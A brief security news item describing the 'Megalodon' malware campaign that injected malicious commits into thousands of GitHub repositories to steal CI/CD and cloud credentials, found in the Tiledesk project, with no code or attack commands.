Technical Details
On May 18, the Megalodon malware attacked the GitHub development platform, injecting malicious commits into over 5,500 repositories.
Malware Description
The primary function of the malware is to steal CI/CD credentials. When a repository owner includes a commit in a project, the malware executes on CI/CD servers and spreads further.
Megalodon Capabilities
The malware steals other sensitive data, including AWS secret keys, Google Cloud tokens, requests metadata from AWS, Google Cloud Platform, and Azure instances, reads private SSH keys, Docker and Kubernetes configurations, Vault tokens, Terraform credentials, and scans source code for other sensitive data using over 30 regular expressions.
Detection
Megalodon was discovered within the open-source Tiledesk platform for online chats and chatbots. The malware did not require compromising the project's npm account; it was sufficient to infect the project on GitHub.
Consequences
Regular GitHub breaches put the security of every company with private repositories on the platform at risk. Malware continues to penetrate servers, and so far, it has not been possible to stop them.